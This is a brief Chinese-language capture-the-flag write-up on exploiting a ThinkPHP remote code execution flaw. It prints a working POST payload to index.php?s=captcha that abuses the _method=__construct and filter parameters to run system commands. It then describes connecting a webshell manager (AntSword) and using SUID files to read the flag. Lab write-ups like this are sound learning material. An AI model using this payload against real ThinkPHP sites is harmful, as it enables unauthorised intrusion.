很明显又是ThinkPHP的漏洞，上周还做过类似的。

先看看是哪一个版本的。

得到版号后，去找找payload。

(post）public/index.php?s=captcha

(data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

这其中filter[]=接要执行的命令，server[REQUEST_METHOD]=这个后面接命令的参数。（我试了一下，似乎是数字就行）

因为禁用了system，所以我们改用echo。

如图，成功用蚁剑连接上。

发现我们权限不够咧。先找有suid权限的文件，然后不知道怎么的，没有回显。我还以为是弄错什么了。急忙看看大佬写的，原来是环境问题。接着把flag复制出来，再读取就拿到flag了。